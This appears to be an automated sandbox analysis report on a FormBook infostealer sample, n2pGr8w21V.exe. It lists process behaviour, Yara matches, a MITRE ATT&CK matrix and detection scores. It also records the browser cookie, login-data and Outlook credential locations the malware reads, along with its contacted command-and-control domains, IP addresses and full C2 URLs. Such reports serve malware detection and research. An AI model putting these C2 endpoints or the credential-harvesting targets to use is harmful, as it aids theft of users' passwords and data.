                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeQueries volume information: C:\Users\user\AppData\Roaming\uEugNEto.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000017.00000002.2508381600.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.2513591894.0000000004CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2511826108.0000000004DB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1576124904.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2507252400.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.2511173788.0000000003760000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1578348944.00000000022B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000017.00000002.2508381600.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.2513591894.0000000004CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2511826108.0000000004DB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1576124904.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2507252400.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.2511173788.0000000003760000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1578348944.00000000022B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job                		1
                Scheduled Task/Job                		612
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		221
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		1
                Scheduled Task/Job                		11
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Abuse Elevation Control Mechanism                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                DLL Side-Loading                		612
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Timestomp                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588691 Sample: n2pGr8w21V.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 59 www.zrinorem-srumimit.sbs 2->59 61 www.lovel.shop 2->61 63 9 other IPs or domains 2->63 75 Suricata IDS alerts for network traffic 2->75 77 Sigma detected: Scheduled temp file as task from temp location 2->77 79 Multi AV Scanner detection for submitted file 2->79 81 5 other signatures 2->81 10 n2pGr8w21V.exe 7 2->10         started        14 uEugNEto.exe 5 2->14         started        signatures3 process4 file5 51 C:\Users\user\AppData\Roaming\uEugNEto.exe, PE32 10->51 dropped 53 C:\Users\...\uEugNEto.exe:Zone.Identifier, ASCII 10->53 dropped 55 C:\Users\user\AppData\Local\...\tmpB98D.tmp, XML 10->55 dropped 57 C:\Users\user\AppData\...\n2pGr8w21V.exe.log, ASCII 10->57 dropped 91 Uses schtasks.exe or at.exe to add and modify task schedules 10->91 93 Writes to foreign memory regions 10->93 95 Allocates memory in foreign processes 10->95 97 Adds a directory exclusion to Windows Defender 10->97 16 RegSvcs.exe 10->16         started        19 powershell.exe 23 10->19         started        21 powershell.exe 23 10->21         started        23 schtasks.exe 1 10->23         started        99 Multi AV Scanner detection for dropped file 14->99 101 Machine Learning detection for dropped file 14->101 103 Injects a PE file into a foreign processes 14->103 25 schtasks.exe 1 14->25         started        27 RegSvcs.exe 14->27         started        signatures6 process7 signatures8 71 Maps a DLL or memory area into another process 16->71 29 ISaSZznjXcpoJ.exe 16->29 injected 73 Loading BitLocker PowerShell Module 19->73 32 conhost.exe 19->32         started        34 WmiPrvSE.exe 19->34         started        36 conhost.exe 21->36         started        38 conhost.exe 23->38         started        40 conhost.exe 25->40         started        process9 signatures10 105 Found direct / indirect Syscall (likely to bypass EDR) 29->105 42 systray.exe 13 29->42         started        process11 signatures12 83 Tries to steal Mail credentials (via file / registry access) 42->83 85 Tries to harvest and steal browser information (history, passwords, etc) 42->85 87 Modifies the context of a thread in another process (thread injection) 42->87 89 3 other signatures 42->89 45 ISaSZznjXcpoJ.exe 42->45 injected 49 firefox.exe 42->49         started        process13 dnsIp14 65 duskgazes.work 15.197.148.33, 49994, 49995, 49996 TANDEMUS United States 45->65 67 hayaniya.org 192.185.147.100, 49986, 49987, 49988 OIS1US United States 45->67 69 4 other IPs or domains 45->69 107 Found direct / indirect Syscall (likely to bypass EDR) 45->107 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                n2pGr8w21V.exe68%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                n2pGr8w21V.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\uEugNEto.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\uEugNEto.exe68%ReversingLabsByteCode-MSIL.Backdoor.FormBook

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.hayaniya.org/yf1h/0%Avira URL Cloudsafe
                http://www.lovel.shop/rxts/?nHI4y=ULkH023p-2&MHJ0GXi=UMqd3Rr/GgjcpDtMifF0hAVXULwugGyaJHdfF0vXYxuoY8NmwcRKHFRQ3Zc522gmFWLmVhpOr5FlbfkrODlmI/FI9mNBtfUcHsH1BXvHeC8ccNMTzjG08xLSDUiWAIgxE0vpFMVGa8250%Avira URL Cloudsafe
                http://www.losmason.shop/s15n/?nHI4y=ULkH023p-2&MHJ0GXi=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY+3nQdNuELRDWQb2uefNArAI9Jzm+wUv6iBr2b0gwhreB6wQHyT0LsuYRSsPCWoh575Uq8xJMJajdjvw7bNvPz2QoSF69NC7qAb+tKFkF0%Avira URL Cloudsafe
                http://www.hayaniya.org/yf1h/?MHJ0GXi=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM+Bxvkr6dioDBNQhLHAnFkN0G7WaNsS3kDmK0ayEpl6TGabHlNeLLSejHELaV5PyBe2QzNbQvUHYc/0M0Tzmov1eC9unFVYK6Dr3q02N&nHI4y=ULkH023p-20%Avira URL Cloudsafe
                http://hayaniya.org/yf1h/?MHJ0GXi=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM0%Avira URL Cloudsafe
                http://www.lovel.shop/rxts/0%Avira URL Cloudsafe
                http://www.holytur.net/cs9k/?MHJ0GXi=W7SiLeR8lVOS0IddzXWoYXDt6RHub9Z/llH5xMN7IPTa857c9EQRUjsfmtg32BbwdcsWIPqYG66ejHdS265gqPapChlQiVLnuWWyjSHSngUOewn7sS2CIDtXVuGZPpJOLluzJeAwPaf/&nHI4y=ULkH023p-20%Avira URL Cloudsafe
                http://www.losmason.shop/s15n/0%Avira URL Cloudsafe
                http://www.duskgazes.work/zs4o/?MHJ0GXi=40yvXZqQXwyOFTl0d1fxwhQGTsZjKCC3JWjHJEZ8IBZutO+YSqvvwioh1RBVRKlMIRVxucUqEMWgr+FAgfZYrRUrNMNQgIXAOg6Dx5ZtNmZ3l7Xsr8IlhehM93LMclm51whCbAvUXWV5&nHI4y=ULkH023p-20%Avira URL Cloudsafe
                http://www.nieuws-july202488.sbs/30le/0%Avira URL Cloudsafe
                http://www.duskgazes.work0%Avira URL Cloudsafe
                http://www.duskgazes.work/zs4o/0%Avira URL Cloudsafe
                http://www.nieuws-july202488.sbs/30le/?MHJ0GXi=jHE7b6Z9ED1A0Je7bwo+kjGjstTykwGZjMkqHVfcjQ95lgOzDj3OOkgun9YTkzFADI0DOvoxgj3LN5jGlHy+BH+AK0OJhf+I7eM6xe7113ZbRKEe7/cQK41GtHqpeCJq4WZTqkgr8MY5&nHI4y=ULkH023p-20%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                nieuws-july202488.sbs
                		162.0.215.33
                		truetrue
                  		unknown
                  hayaniya.org
                  		192.185.147.100
                  		truetrue
                    		unknown
                    holytur.net
                    		185.106.208.3
                    		truefalse
                      		unknown
                      www.losmason.shop
                      		104.18.73.116
                      		truetrue
                        		unknown
                        www.zrinorem-srumimit.sbs
                        		188.114.96.3
                        		truetrue
                          		unknown
                          www.lovel.shop
                          		13.248.169.48
                          		truetrue
                            		unknown
                            duskgazes.work
                            		15.197.148.33
                            		truetrue
                              		unknown
                              www.nieuws-july202488.sbs
                              		unknown
                              		unknownfalse
                                		unknown
                                www.duskgazes.work
                                		unknown
                                		unknownfalse
                                  		unknown
                                  www.holytur.net
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    www.hayaniya.org
                                    		unknown
                                    		unknownfalse
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.hayaniya.org/yf1h/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.losmason.shop/s15n/?nHI4y=ULkH023p-2&MHJ0GXi=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY+3nQdNuELRDWQb2uefNArAI9Jzm+wUv6iBr2b0gwhreB6wQHyT0LsuYRSsPCWoh575Uq8xJMJajdjvw7bNvPz2QoSF69NC7qAb+tKFkFtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.hayaniya.org/yf1h/?MHJ0GXi=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM+Bxvkr6dioDBNQhLHAnFkN0G7WaNsS3kDmK0ayEpl6TGabHlNeLLSejHELaV5PyBe2QzNbQvUHYc/0M0Tzmov1eC9unFVYK6Dr3q02N&nHI4y=ULkH023p-2true
                                      • Avira URL Cloud: safe
                                      		unknown
